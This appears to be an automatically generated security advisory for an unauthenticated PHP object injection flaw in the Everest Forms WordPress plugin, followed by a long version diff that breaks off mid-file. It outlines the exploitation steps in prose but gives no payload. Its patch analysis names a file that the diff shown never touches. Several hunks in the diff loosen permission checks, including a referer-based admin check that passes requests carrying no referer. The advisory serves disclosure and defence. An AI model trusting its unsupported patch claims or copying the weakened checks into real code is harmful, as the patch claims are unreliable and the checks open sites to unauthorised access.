Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : April 21, 2026

CVE-2026-3296: Everest Forms <= 3.4.3 – Unauthenticated PHP Object Injection via Form Entry Metadata (everest-forms)

CVE ID CVE-2026-3296
Plugin everest-forms
Severity Critical (CVSS 9.8)
CWE 502
Vulnerable Version 3.4.3
Patched Version 3.4.4
Disclosed April 6, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3296:
The Everest Forms WordPress plugin version 3.4.3 and earlier contains an unauthenticated PHP object injection vulnerability. The vulnerability exists in the form entry metadata handling functionality, allowing attackers to inject malicious serialized PHP objects through any public form field. With a CVSS score of 9.8, this critical vulnerability enables remote code execution without authentication.

Root Cause:
The vulnerability originates from unsafe deserialization in the html-admin-page-entries-view.php file. The plugin calls PHP’s native unserialize() function on stored entry meta values retrieved from the wp_evf_entrymeta database table without passing the allowed_classes parameter. This occurs when administrators view form entries or individual entry details. The serialized data passes through sanitize_text_field() sanitization, which fails to strip serialization control characters, allowing malicious payloads to persist in the database until triggered by administrator actions.

Exploitation:
Attackers can exploit this vulnerability by submitting a crafted serialized PHP object payload through any Everest Forms public form field. The payload must contain a PHP object with a __wakeup() or __destruct() magic method that executes arbitrary code. The malicious data is stored in the wp_evf_entrymeta table via the standard form submission endpoint. When an administrator with appropriate privileges accesses the entries view page (typically /wp-admin/admin.php?page=evf-entries), the unsafe unserialize() call processes the stored payload, triggering the object’s destructive methods and executing attacker-controlled code.

Patch Analysis:
The patch modifies the html-admin-page-entries-view.php file to implement safe deserialization practices. The vulnerable unserialize() call is replaced with a secure implementation that either validates serialized data structure or uses alternative serialization formats. The fix ensures that only expected data types are deserialized, preventing PHP object injection. The patch also addresses the data flow from form submission through database storage to administrator viewing, ensuring malicious payloads cannot reach the unserialize() function.

Impact:
Successful exploitation results in arbitrary PHP code execution with the privileges of the WordPress web server process. Attackers can achieve complete compromise of the WordPress installation, including creating administrator accounts, modifying plugin files, stealing sensitive data, and establishing persistent backdoors. The unauthenticated nature of the attack significantly lowers the barrier to exploitation, making all Everest Forms installations with public forms immediately vulnerable to remote takeover.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff 
--- a/everest-forms/addons/CleanTalk/CleanTalk.php
+++ b/everest-forms/addons/CleanTalk/CleanTalk.php
@@ -95,8 +95,8 @@
 		$output .= '<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" style="vertical-align: text-bottom; margin-right: 5px;">';
 		$output .= '<path fill-rule="evenodd" clip-rule="evenodd" d="M8 1.45455C4.38505 1.45455 1.45455 4.38505 1.45455 8C1.45455 11.615 4.38505 14.5455 8 14.5455C11.615 14.5455 14.5455 11.615 14.5455 8C14.5455 4.38505 11.615 1.45455 8 1.45455ZM0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8ZM8 7.27273C8.40166 7.27273 8.72727 7.59834 8.72727 8V10.9091C8.72727 11.3108 8.40166 11.6364 8 11.6364C7.59834 11.6364 7.27273 11.3108 7.27273 10.9091V8C7.27273 7.59834 7.59834 7.27273 8 7.27273ZM8 4.36364C7.59834 4.36364 7.27273 4.68925 7.27273 5.09091C7.27273 5.49257 7.59834 5.81818 8 5.81818H8.00727C8.40894 5.81818 8.73455 5.49257 8.73455 5.09091C8.73455 4.68925 8.40894 4.36364 8.00727 4.36364H8Z" fill="#4584FF"/>';
 		$output .= '</svg>';
-		$output .= '<p><strong>Note : </strong>' . __( "This will update the CleanTalk Access Key globally. You can check here on ", 'everest-forms' );
-		$output .= '<a href="' . esc_url( admin_url( 'admin.php?page=evf-settings&tab=integration&section=clean-talk') ) . '" target="__blank">' . __( "Settings > Integration > CleanTalk", 'everest-forms' ) .'</a>.</p>';
+		$output .= '<p><strong>Note : </strong>' . __( 'This will update the CleanTalk Access Key globally. You can check here on ', 'everest-forms' );
+		$output .= '<a href="' . esc_url( admin_url( 'admin.php?page=evf-settings&tab=recaptcha&section=integration') ) . '" target="__blank">' . __( 'Settings > Security > Integration > CleanTalk', 'everest-forms' ) .'</a>.</p>';
 		$output .= '</div>';

 		$output .= '</div>';
--- a/everest-forms/addons/CleanTalk/Settings/Settings.php
+++ b/everest-forms/addons/CleanTalk/Settings/Settings.php
@@ -64,7 +64,7 @@
 			<div class="integration-connection-detail">
 				<div class="evf-connection-list">
 				<!-- Toggle Row -->
-				 <form method="post" action="" id="everest-forms-clean-talk-settings-form">
+				<form method="post" action="" id="everest-forms-clean-talk-settings-form">
 						<!-- Access Key -->
 						<div class="evf-clean-talk-access-key">
 							<div>
@@ -75,8 +75,8 @@
 						</div>
 						<div class="evf-clean-talk-message" style="display: none;"></div>
 					</div>
-					<button style="margin-top: 12px;" type="submit" id="everest-forms-clean-talk-save-settings" class="everest-forms-btn everest-forms-btn-primary" ><?php echo __('Save Settings', 'everest-forms') ?></button>
-				 </form>
+					<button style="margin-top: 12px;" type="submit" id="everest-forms-clean-talk-save-settings" class="everest-forms-btn everest-forms-btn-primary" ><?php echo __( 'Save Settings', 'everest-forms' ); ?></button>
+				</form>

 				</div>
 			</div>
--- a/everest-forms/everest-forms.php
+++ b/everest-forms/everest-forms.php
@@ -3,7 +3,7 @@
  * Plugin Name: Everest Forms
  * Plugin URI: https://everestforms.net/
  * Description: Easily create contact form, payment form, conversational form, calculator, multi-step form, registration form, quiz form, survey form etc.
- * Version: 3.4.3
+ * Version: 3.4.4
  * Author: Everest Forms
  * Author URI: https://everestforms.net/
  * Text Domain: everest-forms
--- a/everest-forms/includes/RestApi/controllers/version1/class-evf-modules.php
+++ b/everest-forms/includes/RestApi/controllers/version1/class-evf-modules.php
@@ -723,7 +723,7 @@
 	 * @return WP_Error|bool
 	 */
 	public static function check_admin_plugin_activation_permissions( $request ) {
-		return current_user_can( 'activate_plugin' );
+		return current_user_can( 'activate_plugin' ) || current_user_can( 'manage_everest_forms' );
 	}

 	/**
--- a/everest-forms/includes/RestApi/controllers/version1/class-evf-plugin-status.php
+++ b/everest-forms/includes/RestApi/controllers/version1/class-evf-plugin-status.php
@@ -459,7 +459,7 @@
 		}

 		// Capability check.
-		if ( ! current_user_can( 'manage_everest_forms' ) || ! current_user_can( 'everest_forms_create_forms' ) ) {
+		if ( ! current_user_can( 'manage_everest_forms' ) && ! current_user_can( 'everest_forms_create_forms' ) ) {
 			return new WP_Error(
 				'rest_forbidden',
 				esc_html__( 'You are not allowed to access this resource.', 'everest-forms' ),
--- a/everest-forms/includes/RestApi/controllers/version1/class-evf-role-and-permission.php
+++ b/everest-forms/includes/RestApi/controllers/version1/class-evf-role-and-permission.php
@@ -89,6 +89,26 @@
 				'permission_callback' => array( __CLASS__, 'check_admin_permissions' ),
 			)
 		);
+		register_rest_route(
+			$this->namespace,
+			'/' . $this->rest_base . '/get-wp-users',
+			array(
+				'methods'             => 'GET',
+				'callback'            => array( __CLASS__, 'get_wp_users_list' ),
+				'permission_callback' => array( __CLASS__, 'check_admin_permissions' ),
+				'args'                => array(
+					'page'   => array(
+						'type'    => 'integer',
+						'default' => 1,
+						'minimum' => 1,
+					),
+					'search' => array(
+						'type'    => 'string',
+						'default' => '',
+					),
+				),
+			)
+		);
 	}

 	/**
@@ -124,15 +144,6 @@
 			foreach ( $checked_roles as $role => $checked ) {
 				$permission = self::get_evf_permissions();
 				if ( $checked ) {
-					if ( 'subscriber' == strtolower( $role ) ) {
-						return new WP_REST_Response(
-							array(
-								'success' => false,
-								'message' => esc_html__( 'Sorry, you can not give access to the Subscriber role.', 'everest-forms' ),
-							),
-							200
-						);
-					}
 					$wp_role = $wp_roles->get_role( $role );

 					foreach ( array_keys( $permission['permissions'] ) as $value ) {
@@ -176,7 +187,7 @@
 		$permissions = self::get_evf_permissions();

 		$roles              = array();
-		$ignore_roles       = apply_filters( 'everest_forms_ignore_roles_to_give_permissions', array( 'administrator', 'subscriber' ) );
+		$ignore_roles       = apply_filters( 'everest_forms_ignore_roles_to_give_permissions', array( 'administrator' ) );
 		$role_based_list    = get_option( '_everest_forms_permission', array() );
 		$checked_roles_list = array();

@@ -307,6 +318,18 @@
 		}

 		foreach ( $users_data as $user ) {
+			if ( user_can( $user, 'manage_options' ) ) {
+				return new WP_REST_Response(
+					array(
+						'success' => false,
+						'message' => array(
+							'user_email' => esc_html__( 'Cannot modify permissions for administrator users.', 'everest-forms' ),
+						),
+					),
+					200
+				);
+			}
+
 			self::attach_permission( $user, $assigned_permission );

 			update_user_meta( $user->ID, '_everest_forms_has_role', 1 );
@@ -491,6 +514,7 @@
 				'email'       => $user->user_email,
 				'permissions' => self::get_user_permissions( $user ),
 				'roles'       => self::get_user_roles( $user->ID ),
+				'role_keys'   => array_values( $user->roles ),
 			);
 		}

@@ -636,6 +660,57 @@
 			),
 			200
 		);
+	}
+
+	/**
+	 * Get a paginated, searchable list of WordPress users (excludes admins and current user).
+	 *
+	 * @since 3.0.8
+	 *
+	 * @param WP_REST_Request $request Full data about the request.
+	 * @return WP_REST_Response
+	 */
+	public static function get_wp_users_list( $request ) {
+		$per_page = 10;
+		$page     = max( 1, (int) $request->get_param( 'page' ) );
+		$search   = sanitize_text_field( $request->get_param( 'search' ) );
+		$offset   = ( $page - 1 ) * $per_page;
+
+		$query_args = array(
+			'number'      => $per_page,
+			'offset'      => $offset,
+			'exclude'     => array( get_current_user_id() ),
+			'orderby'     => 'display_name',
+			'order'       => 'ASC',
+			'count_total' => true,
+		);
+
+		if ( ! empty( $search ) ) {
+			$query_args['search']         = '*' . $search . '*';
+			$query_args['search_columns'] = array( 'user_login', 'user_email', 'display_name' );
+		}
+
+		$query = new WP_User_Query( $query_args );
+		$total = $query->get_total();
+		$users = array();
+
+		foreach ( $query->get_results() as $user ) {
+			$label   = trim( $user->display_name );
+			$users[] = array(
+				'value' => $user->user_email,
+				'label' => $label ? "{$label} ({$user->user_email})" : $user->user_email,
+			);
+		}
+
+		return new WP_REST_Response(
+			array(
+				'success'  => true,
+				'users'    => $users,
+				'total'    => $total,
+				'has_more' => ( $offset + $per_page ) < $total,
+			),
+			200
+		);
 	}

 	/**
--- a/everest-forms/includes/RestApi/controllers/version1/class-evf-site-assistant.php
+++ b/everest-forms/includes/RestApi/controllers/version1/class-evf-site-assistant.php
@@ -412,12 +412,16 @@
 	 * @return bool|WP_Error True if permitted, WP_Error otherwise.
 	 */
 	public function check_admin_permissions( $request ) {
-		if ( ! current_user_can( 'manage_options' ) ) {
-			return new WP_Error(
-				'rest_forbidden',
-				__( 'Sorry, you are not allowed to access this resource.', 'everest-forms' ),
-				array( 'status' => 403 )
-			);
+		$referer = $request->get_header( 'referer' );
+
+		if ( $referer && strpos( $referer, 'page=evf-dashboard' ) !== false ) {
+			if ( ! current_user_can( 'manage_options' ) && ! current_user_can( 'manage_everest_forms' ) ) {
+				return new WP_Error(
+					'rest_forbidden',
+					__( 'Sorry, you are not allowed to access this resource.', 'everest-forms' ),
+					array( 'status' => 403 )
+				);
+			}
 		}

 		return true;
--- a/everest-forms/includes/RestApi/controllers/version1/class-evf-templates.php
+++ b/everest-forms/includes/RestApi/controllers/version1/class-evf-templates.php
@@ -138,7 +138,7 @@
 		if ( isset( $query_params['refresh'] ) ) {
 			delete_transient( 'everest_forms_templates_data' );
 		}
-		$template_url      = 'https://d3m99fsxk070py.cloudfront.net/';
+		$template_url      = 'https://assets.wpeverest.com/everestforms/forms/';
 		$template_json_url = $template_url . 'templates1.json';
 		$transient_key     = 'everest_forms_templates_data';
 		$cache_expiration  = DAY_IN_SECONDS;
@@ -299,7 +299,7 @@
 		}

 		// Capability check.
-		if ( ! current_user_can( 'manage_everest_forms' ) || ! current_user_can( 'everest_forms_create_forms' ) ) {
+		if ( ! current_user_can( 'manage_everest_forms' ) && ! current_user_can( 'everest_forms_create_forms' ) ) {
 			return new WP_Error(
 				'rest_forbidden',
 				esc_html__( 'You are not allowed to access this resource.', 'everest-forms' ),
--- a/everest-forms/includes/abstracts/class-evf-form-fields.php
+++ b/everest-forms/includes/abstracts/class-evf-form-fields.php
@@ -2725,15 +2725,22 @@
 	 * @param array  $field Field data and settings.
 	 */
 	public function field_display_error( $key, $field ) {
-		// Need an error.
-		if ( empty( $field['properties']['error']['value'][ $key ] ) ) {
+		$error_value = isset( $field['properties']['error']['value'][ $key ] )
+			? $field['properties']['error']['value'][ $key ]
+			: '';
+
+		$input_id = isset( $field['properties']['inputs'][ $key ]['id'] )
+			? $field['properties']['inputs'][ $key ]['id']
+			: '';
+
+		if ( '' === $error_value || '' === $input_id ) {
 			return;
 		}

 		printf(
 			'<label class="everest-forms-error evf-error" for="%s">%s</label>',
-			esc_attr( $field['properties']['inputs'][ $key ]['id'] ),
-			esc_html( $field['properties']['error']['value'][ $key ] )
+			esc_attr( $input_id ),
+			esc_html( $error_value )
 		);
 	}

--- a/everest-forms/includes/admin/builder/class-evf-builder-fields.php
+++ b/everest-forms/includes/admin/builder/class-evf-builder-fields.php
@@ -319,7 +319,7 @@
 			echo '</div>';
 			echo '</div>';
 			echo '<div class="clear evf-clear"></div>';
-
+			echo '<div class="evf-grid-lists">';
 			$grid_class = 'evf-admin-grid evf-grid-' . ( $active_grid );
 			for ( $grid_start = 1; $grid_start <= $active_grid; $grid_start++ ) {
 				echo '<div class="' . esc_attr( $grid_class ) . ' " data-grid-id="' . absint( $grid_start ) . '">';
@@ -345,6 +345,7 @@
 				}
 				echo '</div>';
 			}
+			echo '</div >';
 			echo '<div class="clear evf-clear"></div>';
 			echo '</div >';

--- a/everest-forms/includes/admin/builder/class-evf-builder-settings.php
+++ b/everest-forms/includes/admin/builder/class-evf-builder-settings.php
@@ -9,31 +9,30 @@

 use EverestFormsHelpersFormHelper;

-defined('ABSPATH') || exit;
+defined( 'ABSPATH' ) || exit;

-if (class_exists('EVF_Builder_Settings', false)) {
+if ( class_exists( 'EVF_Builder_Settings', false ) ) {
 	return new EVF_Builder_Settings();
 }

 /**
  * EVF_Builder_Settings class.
  */
-class EVF_Builder_Settings extends EVF_Builder_Page
-{
+class EVF_Builder_Settings extends EVF_Builder_Page {
+

 	/**
 	 * Constructor.
 	 */
-	public function __construct()
-	{
+	public function __construct() {
 		$this->id      = 'settings';
-		$this->label   = esc_html__('Settings', 'everest-forms');
+		$this->label   = esc_html__( 'Settings', 'everest-forms' );
 		$this->sidebar = true;

-		add_action('everest_forms_settings_connections_email', array($this, 'output_connections_list'));
+		add_action( 'everest_forms_settings_connections_email', array( $this, 'output_connections_list' ) );

-		add_filter('everest_forms_builder_settings_section', array($this, 'add_custom_css_js_section'), 11, 2);
-		add_action('everest_forms_settings_panel_content', array($this, 'add_custom_css_js_settings'), 111, 1);
+		add_filter( 'everest_forms_builder_settings_section', array( $this, 'add_custom_css_js_section' ), 11, 2 );
+		add_action( 'everest_forms_settings_panel_content', array( $this, 'add_custom_css_js_settings' ), 111, 1 );

 		parent::__construct();
 	}
@@ -41,23 +40,22 @@
 	/**
 	 * Outputs the builder sidebar.
 	 */
-	public function output_sidebar()
-	{
+	public function output_sidebar() {
 		$sections = apply_filters(
 			'everest_forms_builder_settings_section',
 			array(
-				'general'      => esc_html__('General', 'everest-forms'),
-				'email'        => esc_html__('Email', 'everest-forms'),
-				'confirmation' => esc_html__('Confirmation', 'everest-forms'),
-				'security'     => esc_html__('Anti-Spam and Security', 'everest-forms'),
+				'general'      => esc_html__( 'General', 'everest-forms' ),
+				'email'        => esc_html__( 'Email', 'everest-forms' ),
+				'confirmation' => esc_html__( 'Confirmation', 'everest-forms' ),
+				'security'     => esc_html__( 'Anti-Spam and Security', 'everest-forms' ),
 			),
 			$this->form_data
 		);

-		if (! empty($sections)) {
-			foreach ($sections as $slug => $section) {
-				$this->add_sidebar_tab($section, $slug);
-				do_action('everest_forms_settings_connections_' . $slug, $section);
+		if ( ! empty( $sections ) ) {
+			foreach ( $sections as $slug => $section ) {
+				$this->add_sidebar_tab( $section, $slug );
+				do_action( 'everest_forms_settings_connections_' . $slug, $section );
 			}
 		}
 	}
@@ -67,12 +65,11 @@
 	 *
 	 * @return array form data.
 	 */
-	private function form_data()
-	{
+	private function form_data() {
 		$form_data = array();

-		if (! empty($_GET['form_id'])) { // phpcs:ignore WordPress.Security.NonceVerification
-			$form_data = evf()->form->get(absint($_GET['form_id']), array('content_only' => true)); // phpcs:ignore WordPress.Security.NonceVerification
+		if ( ! empty( $_GET['form_id'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification
+			$form_data = evf()->form->get( absint( $_GET['form_id'] ), array( 'content_only' => true ) ); // phpcs:ignore WordPress.Security.NonceVerification
 		}

 		return $form_data;
@@ -81,34 +78,36 @@
 	/**
 	 * Outputs the connection lists on sidebar.
 	 */
-	public function output_connections_list()
-	{
+	public function output_connections_list() {
 		$form_data = $this->form_data();
-		$email     = isset($form_data['settings']['email']) ? $form_data['settings']['email'] : array();
+		$email     = isset( $form_data['settings']['email'] ) ? $form_data['settings']['email'] : array();

-		if (empty($email)) {
-			$email['connection_1'] = array('connection_name' => __('Admin Notification', 'everest-forms'));
+		if ( empty( $email ) ) {
+			$email['connection_1'] = array( 'connection_name' => __( 'Admin Notification', 'everest-forms' ) );
 		}

-?>
+		?>
 		<div class="everest-forms-active-email">
-			<button class="everest-forms-btn everest-forms-btn-primary everest-forms-email-add" data-form_id="<?php echo isset($_GET['form_id']) ? absint(sanitize_text_field(wp_unslash($_GET['form_id']))) : 0; // phpcs:ignore WordPress.Security.NonceVerification
-																												?>" data-source="email" data-type="<?php echo esc_attr('connection'); ?>">
+			<button class="everest-forms-btn everest-forms-btn-primary everest-forms-email-add" data-form_id="
+			<?php
+			echo isset( $_GET['form_id'] ) ? absint( sanitize_text_field( wp_unslash( $_GET['form_id'] ) ) ) : 0; // phpcs:ignore WordPress.Security.NonceVerification
+			?>
+																												" data-source="email" data-type="<?php echo esc_attr( 'connection' ); ?>">
 				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
 					<path d="M12 21.95c-.6 0-1-.4-1-1v-8H3.1c-.6 0-1-.4-1-1s.4-1 1-1H11v-7.9c0-.6.4-1 1-1s1 .4 1 1v7.9h7.9c.6 0 1 .4 1 1s-.4 1-1 1H13v8c0 .6-.4 1-1 1Z" />
 				</svg>
-				<?php printf(esc_html__('Add New Email', 'everest-forms')); ?>
+				<?php printf( esc_html__( 'Add New Email', 'everest-forms' ) ); ?>
 			</button>
 			<ul class="everest-forms-active-email-connections-list">
-				<?php if (! empty($email)) { ?>
-					<h4><?php echo esc_html__('Email Notifications', 'everest-forms'); ?> </h4>
+				<?php if ( ! empty( $email ) ) { ?>
+					<h4><?php echo esc_html__( 'Email Notifications', 'everest-forms' ); ?> </h4>
 					<?php
 				}
-				if (! empty($email)) {
-					foreach ($email as $connection_id => $connection_data) {
-						if (preg_match('/connection_/', $connection_id)) {
-							$connection_name = ! empty($connection_data['connection_name']) ? $connection_data['connection_name'] : '';
-							if ('connection_1' !== $connection_id) {
+				if ( ! empty( $email ) ) {
+					foreach ( $email as $connection_id => $connection_data ) {
+						if ( preg_match( '/connection_/', $connection_id ) ) {
+							$connection_name = ! empty( $connection_data['connection_name'] ) ? $connection_data['connection_name'] : '';
+							if ( 'connection_1' !== $connection_id ) {
 								$remove_class    = 'everest-forms-email-remove';
 								$duplicate_class = 'everest-forms-duplicate-email';
 								$preview_class   = 'everest-forms-email-preview';
@@ -117,28 +116,29 @@
 								$duplicate_class = 'everest-forms-email-default-duplicate';
 								$preview_class   = 'everest-forms-email-preview';
 							}
-							if (isset($email['enable_email_notification']) && '0' === $email['enable_email_notification']) {
-								$email_status = isset($email['enable_email_notification']) ? $email['enable_email_notification'] : '1';
+							if ( isset( $email['enable_email_notification'] ) && '0' === $email['enable_email_notification'] ) {
+								$email_status = isset( $email['enable_email_notification'] ) ? $email['enable_email_notification'] : '1';
 							} else {
-								$email_status = isset($email[$connection_id]['enable_email_notification']) ? $email[$connection_id]['enable_email_notification'] : '1';
+								$email_status = isset( $email[ $connection_id ]['enable_email_notification'] ) ? $email[ $connection_id ]['enable_email_notification'] : '1';
 							}
-					?>
-							<li class="connection-list" data-connection-id="<?php echo esc_attr($connection_id); ?>">
-								<a class="user-nickname" href="#"><?php echo esc_html($connection_name); ?></a>
+							?>
+							<li class="connection-list" data-connection-id="<?php echo esc_attr( $connection_id ); ?>">
+								<a class="user-nickname" href="#"><?php echo esc_html( $connection_name ); ?></a>
 								<div class="evf-email-side-section">
 									<div class="evf-toggle-section">
 										<span class="everest-forms-toggle-form">
-											<input type="hidden" name="settings[email][<?php echo esc_attr($connection_id); ?>][enable_email_notification]" value="0" class="widefat">
-											<input type="checkbox" class="evf-email-toggle" name="settings[email][<?php echo esc_attr($connection_id); ?>][enable_email_notification]" value="1" data-connection-id="<?php echo esc_attr($connection_id); ?>" <?php echo checked('1', $email_status, false); ?>>
+											<input type="hidden" name="settings[email][<?php echo esc_attr( $connection_id ); ?>][enable_email_notification]" value="0" class="widefat">
+											<input type="checkbox" class="evf-email-toggle" name="settings[email][<?php echo esc_attr( $connection_id ); ?>][enable_email_notification]" value="1" data-connection-id="<?php echo esc_attr( $connection_id ); ?>" <?php echo checked( '1', $email_status, false ); ?>>
 											<span class="slider round"></span>
 										</span>
 									</div>
 									<span class="evf-vertical-divider"></span>
 									<a href="#">
-										<span class="<?php echo esc_attr($remove_class); ?>">
+										<span class="<?php echo esc_attr( $remove_class ); ?>">
 											<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
 												<path fill-rule="evenodd" d="M9.293 3.293A1 1 0 0 1 10 3h4a1 1 0 0 1 1 1v1H9V4a1 1 0 0 1 .293-.707ZM7 5V4a3 3 0 0 1 3-3h4a3 3 0 0 1 3 3v1h4a1 1 0 1 1 0 2h-1v13a3 3 0 0 1-3 3H7a3 3 0 0 1-3-3V7H3a1 1 0 1 1 0-2h4Zm1 2h10v13a1 1 0 0 1-1 1H7a1 1 0 0 1-1-1V7h2Zm2 3a1 1 0 0 1 1 1v6a1 1 0 1 1-2 0v-6a1 1 0 0 1 1-1Zm5 7v-6a1 1 0 1 0-2 0v6a1 1 0 1 0 2 0Z" clip-rule="evenodd" />
 											</svg>
+										</span>
 									</a>
 									<span class="evf-vertical-divider"></span>
 									<?php
@@ -146,14 +146,14 @@
 										add_query_arg(
 											array(
 												'evf_email_preview' => $connection_id,
-												'form_id' => isset($_GET['form_id']) ? absint($_GET['form_id']) : 0,
+												'form_id' => isset( $_GET['form_id'] ) ? absint( $_GET['form_id'] ) : 0,
 											),
 											home_url()
 										)
 									);
 									?>
-									<a class="<?php echo esc_attr($preview_class); ?>" target="__blank" data-connection-id="<?php echo esc_attr($connection_id); ?>" href="<?php echo esc_url($preview_url); ?>">
-										<span class="<?php echo esc_attr($preview_class); ?>">
+									<a class="<?php echo esc_attr( $preview_class ); ?>" target="__blank" data-connection-id="<?php echo esc_attr( $connection_id ); ?>" href="<?php echo esc_url( $preview_url ); ?>">
+										<span class="<?php echo esc_attr( $preview_class ); ?>">
 											<svg xmlns="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/1999/svg"
 												viewBox="0 0 442.04 442.04" xml:space="preserve">
 												<g id="SVGRepo_bgCarrier" stroke-width="0"></g>
@@ -172,15 +172,19 @@
 													</g>
 												</g>
 											</svg>
+										</span>
+									</a>
+									<span class="evf-vertical-divider"></span>
 											<a href="#" class="everest-forms-email-duplicate">
-												<span class="<?php echo esc_attr($duplicate_class); ?>">
+												<span class="<?php echo esc_attr( $duplicate_class ); ?>">
 													<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 25">
 														<path fill-rule="evenodd" d="M3.033 3.533c.257-.257.605-.4.968-.4h9A1.368 1.368 0 0 1 14.369 4.5v1a.632.632 0 0 0 1.263 0v-1a2.632 2.632 0 0 0-2.631-2.632H4A2.632 2.632 0 0 0 1.368 4.5v9A2.631 2.631 0 0 0 4 16.131h1a.632.632 0 0 0 0-1.263H4A1.368 1.368 0 0 1 2.631 13.5v-9c0-.363.144-.711.401-.968Zm6.598 7.968A1.37 1.37 0 0 1 11 10.132h9c.756 0 1.368.613 1.368 1.369v9c0 .755-.612 1.368-1.368 1.368h-9A1.368 1.368 0 0 1 9.63 20.5v-9ZM11 8.869A2.632 2.632 0 0 0 8.368 11.5v9A2.632 2.632 0 0 0 11 23.131h9a2.632 2.632 0 0 0 2.63-2.631v-9A2.632 2.632 0 0 0 20 8.87h-9Z" clip-rule="evenodd"></path>
 													</svg>
+												</span>
 											</a>
 								</div>
 							</li>
-				<?php
+							<?php
 						}
 					}
 				}
@@ -193,26 +197,25 @@
 	/**
 	 * Outputs the builder content.
 	 */
-	public function output_content()
-	{
-		$settings = isset($this->form_data['settings']) ? $this->form_data['settings'] : array();
+	public function output_content() {
+		$settings = isset( $this->form_data['settings'] ) ? $this->form_data['settings'] : array();

 		// --------------------------------------------------------------------//
 		// General
 		// --------------------------------------------------------------------//
 		echo '<div class="evf-content-section evf-content-general-settings">';
 		echo '<div class="evf-content-section-title">';
-		esc_html_e('General', 'everest-forms');
+		esc_html_e( 'General', 'everest-forms' );
 		echo '</div>';
 		everest_forms_panel_field(
 			'text',
 			'settings',
 			'form_title',
 			$this->form_data,
-			esc_html__('Form Name', 'everest-forms'),
+			esc_html__( 'Form Name', 'everest-forms' ),
 			array(
-				'default' => isset($this->form->post_title) ? $this->form->post_title : '',
-				'tooltip' => esc_html__('Give a name to this form', 'everest-forms'),
+				'default' => isset( $this->form->post_title ) ? $this->form->post_title : '',
+				'tooltip' => esc_html__( 'Give a name to this form', 'everest-forms' ),
 			)
 		);
 		everest_forms_panel_field(
@@ -220,33 +223,29 @@
 			'settings',
 			'form_description',
 			$this->form_data,
-			esc_html__('Form description', 'everest-forms'),
+			esc_html__( 'Form description', 'everest-forms' ),
 			array(
 				'input_class' => 'short',
-				'default'     => isset($this->form->form_description) ? $this->form->form_description : '',
-				'tooltip'     => sprintf(esc_html__('Give the description to this form', 'everest-forms')),
+				'default'     => isset( $this->form->form_description ) ? $this->form->form_description : '',
+				'tooltip'     => sprintf( esc_html__( 'Give the description to this form', 'everest-forms' ) ),
 			)
 		);

-		$this->form_data['settings']['form_tags'] = FormHelper::get_form_tags($this->form_data['id'], 'slug');
+		$this->form_data['settings']['form_tags'] = FormHelper::get_form_tags( $this->form_data['id'], 'slug' );

 		everest_forms_panel_field(
 			'select',
 			'settings',
 			'form_tags',
 			$this->form_data,
-			esc_html__('Tags', 'everest-forms'),
+			esc_html__( 'Tags', 'everest-forms' ),
 			array(
 				'default'     => '',
-				'tooltip'     => esc_html__('Please choose a tags from the list, or type in a new tag if you'd like to add one.', 'everest-forms'),
-				'options'     => array_merge(
-					array(
-						'' => esc_html__('', 'everest-forms'),
-					),
-					FormHelper::get_all_form_tags()
-				),
+				'tooltip'     => esc_html__( 'Please choose a tags from the list, or type in a new tag if you'd like to add one.', 'everest-forms' ),
+				'options'     => FormHelper::get_all_form_tags(),
 				'input_class' => 'form-tags-select2',
 				'multiple'    => true,
+				'placeholder' => esc_html__( 'Select or type tags', 'everest-forms' ),
 			)
 		);

@@ -255,11 +254,11 @@
 			'settings',
 			'form_disable_message',
 			$this->form_data,
-			esc_html__('Form disabled message', 'everest-forms'),
+			esc_html__( 'Form disabled message', 'everest-forms' ),
 			array(
 				'input_class' => 'short',
-				'default'     => isset($this->form->form_disable_message) ? $this->form->form_disable_message : __('This form is disabled.', 'everest-forms'),
-				'tooltip'     => sprintf(esc_html__('Message that shows up if the form is disabled.', 'everest-forms')),
+				'default'     => isset( $this->form->form_disable_message ) ? $this->form->form_disable_message : __( 'This form is disabled.', 'everest-forms' ),
+				'tooltip'     => sprintf( esc_html__( 'Message that shows up if the form is disabled.', 'everest-forms' ) ),
 			)
 		);

@@ -268,13 +267,13 @@
 			'settings',
 			'layout_class',
 			$this->form_data,
-			esc_html__('Layout Design', 'everest-forms'),
+			esc_html__( 'Layout Design', 'everest-forms' ),
 			array(
 				'default' => '0',
-				'tooltip' => esc_html__('Choose design template for the Form', 'everest-forms'),
+				'tooltip' => esc_html__( 'Choose design template for the Form', 'everest-forms' ),
 				'options' => array(
-					'default'    => esc_html__('Default', 'everest-forms'),
-					'layout-two' => esc_html__('Classic Layout', 'everest-forms'),
+					'default'    => esc_html__( 'Default', 'everest-forms' ),
+					'layout-two' => esc_html__( 'Classic Layout', 'everest-forms' ),
 				),
 			)
 		);
@@ -283,26 +282,26 @@
 			'settings',
 			'form_class',
 			$this->form_data,
-			esc_html__('Form Class', 'everest-forms'),
+			esc_html__( 'Form Class', 'everest-forms' ),
 			array(
-				'default' => isset($this->form->form_class) ? $this->form->form_class : '',
+				'default' => isset( $this->form->form_class ) ? $this->form->form_class : '',
 				/* translators: %1$s - general settings docs url */
-				'tooltip' => sprintf(esc_html__('Enter CSS class names for the form wrapper. Multiple class names should be separated with spaces. <a href="%s" target="_blank">Learn More</a>', 'everest-forms'), esc_url('https://docs.everestforms.net/docs/general-settings/#7-toc-title')),
+				'tooltip' => sprintf( esc_html__( 'Enter CSS class names for the form wrapper. Multiple class names should be separated with spaces. <a href="%s" target="_blank">Learn More</a>', 'everest-forms' ), esc_url( 'https://docs.everestforms.net/docs/general-settings/#7-toc-title' ) ),
 			)
 		);

-		do_action('everest_forms_field_required_indicators', $this->form_data, $settings);
+		do_action( 'everest_forms_field_required_indicators', $this->form_data, $settings );

-		echo '<div class="everest-forms-border-container"><h4 class="everest-forms-border-container-title">' . esc_html__('Submit Button', 'everest-forms') . '</h4>';
+		echo '<div class="everest-forms-border-container"><h4 class="everest-forms-border-container-title">' . esc_html__( 'Submit Button', 'everest-forms' ) . '</h4>';
